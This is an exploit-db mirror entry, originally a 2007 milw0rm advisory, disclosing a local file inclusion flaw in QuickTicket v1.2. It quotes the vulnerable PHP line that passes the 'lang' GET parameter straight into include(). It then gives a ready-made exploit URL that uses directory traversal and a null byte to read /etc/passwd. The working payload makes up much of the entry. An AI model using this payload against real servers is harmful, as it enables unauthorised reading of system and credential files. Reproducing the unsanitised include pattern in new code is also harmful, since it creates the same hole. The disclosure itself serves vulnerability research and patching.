exploit-db-mirror/platforms/php/webapps/4116.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

16 lines
382 B
Text
Executable file

###QuickTicket v1.2 Local File Inclusion###
#download: http://www.qt-cute.org/download/qti12.zip
#found by: katatafish (karatatata@hush.com)
#vulncode:
$strLang = $_GET["lang"];
include("language/$strLang/qtf_lang_reg.inc");
#exploit:
http://www.site.com/[path]/qti_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
#thanks:str0ke
# milw0rm.com [2007-06-27]